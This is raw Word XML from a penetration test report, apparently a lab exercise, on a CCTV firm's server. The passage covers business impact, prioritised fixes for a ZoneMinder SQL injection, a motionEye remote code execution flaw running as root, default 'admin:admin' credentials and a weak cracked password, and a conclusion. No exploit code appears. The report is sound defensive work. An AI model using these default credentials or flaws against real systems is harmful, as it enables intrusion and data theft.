                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Default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DD">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c55a11"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>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DE">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c55a11"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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DF">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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0">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Admin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1">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Weak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2">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c55a11"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>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3">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c55a11"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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4">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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b6" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="140.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E5">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH access</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E6">
      <w:pPr>
        <w:spacing w:after="0" w:before="160" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="110" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2e75b6"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3  Real-World Business Impact</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Breach — All files, credentials, and camera footage are exposed. GDPR fines of up to 4% of annual turnover apply.</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Ransomware Risk — With root access, an attacker can encrypt all files and demand payment.</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Physical Security Risk — Remote camera disabling could cover a physical break-in.</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Reputational Damage — A CCTV security company being hacked publicly destroys customer trust.</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Lateral Movement — The compromised server could be used as a launchpad to attack other systems on the same network.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3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75623" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="140.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EE">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8.  RECOMMENDATIONS</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EF">
      <w:pPr>
        <w:spacing w:after="0" w:before="140" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F0">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Recommendations are ordered by priority — Critical fixes should be done within 24 hours, High within 1 week, and Medium within 1 month.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table36"/>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F1">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">🔴  REC-01  [CRITICAL — Do Within 24 Hours]  Patch ZoneMinder (CVE-2024-51482)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100.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="14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SQL injection vulnerability in ZoneMinder v1.37.63 allowed complete database extraction. This vulnerability is already patched in newer versions.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F3">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Action: Run sudo apt update &amp;&amp; sudo apt upgrade zoneminder or download the latest release from the official ZoneMinder GitHub repository.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F4">
      <w:pPr>
        <w:spacing w:after="0" w:before="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3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0000" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="140.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F5">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">🔴  REC-02  [CRITICAL — Do Within 24 Hours]  Patch motionEye &amp; Remove Root Privileges (CVE-2025-60787)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d6" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="14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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">motionEye contained an RCE vulnerability and was running as root — a combination that led to complete system compromise.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F7">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Action: Update motionEye. In /etc/systemd/system/motioneye.service, change "User=root" to "User=motioneye". Create a dedicated low-privilege system account for the service.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F8">
      <w:pPr>
        <w:spacing w:after="0" w:before="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table38"/>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1F9">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">🟠  REC-03  [HIGH — Do Within 48 Hours]  Change All Default Passwords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b6" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="14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ZoneMinder admin panel was accessible using "admin:admin" — the publicly known factory default. This enabled all subsequent attacks.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FB">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Action: Change the admin password to a randomly generated password of 20+ characters. Store it in a password manager such as Bitwarden or LastPass.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FC">
      <w:pPr>
        <w:spacing w:after="0" w:before="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3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55a11" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="140.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FD">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">🟠  REC-04  [HIGH — Do Within 1 Week]  Enforce Strong Password Policy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ce4b6" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="14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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mark's password "opensesame" was a common dictionary word found in the rockyou.txt breach list and cracked in under one minute.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FF">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Action: Require all passwords to be minimum 12 characters, mixing uppercase, lowercase, numbers, and symbols. Ban dictionary words. Train staff on using a password manager.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000200">
      <w:pPr>
        <w:spacing w:after="0" w:before="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table40"/>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f6000" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="140.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000201">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">🟡  REC-05  [MEDIUM — Do Within 1 Month]  Restrict Admin Panel Access &amp; Enable Auto-Updates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40.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="14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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The ZoneMinder admin panel was publicly accessible from the internet with no IP restriction or VPN requirement.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000203">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Action: Restrict /zm/ to specific trusted IP addresses using Apache configuration or a firewall. Enable automatic security updates (unattended-upgrades) to ensure future patches are applied promptly.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000204">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table41"/>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205">
            <w:pPr>
              <w:spacing w:after="100" w:before="100" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="38"/>
                <w:szCs w:val="38"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">✅   9.  CONCLUSION</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000206">
      <w:pPr>
        <w:spacing w:after="0" w:before="140" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000207">
      <w:pPr>
        <w:spacing w:after="13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This penetration test demonstrated a complete attack chain from zero access to full root control, using only publicly available tools and well-known techniques. No advanced skills were required — every vulnerability exploited here is documented, patched in newer versions, and preventable with basic security hygiene.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000208">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
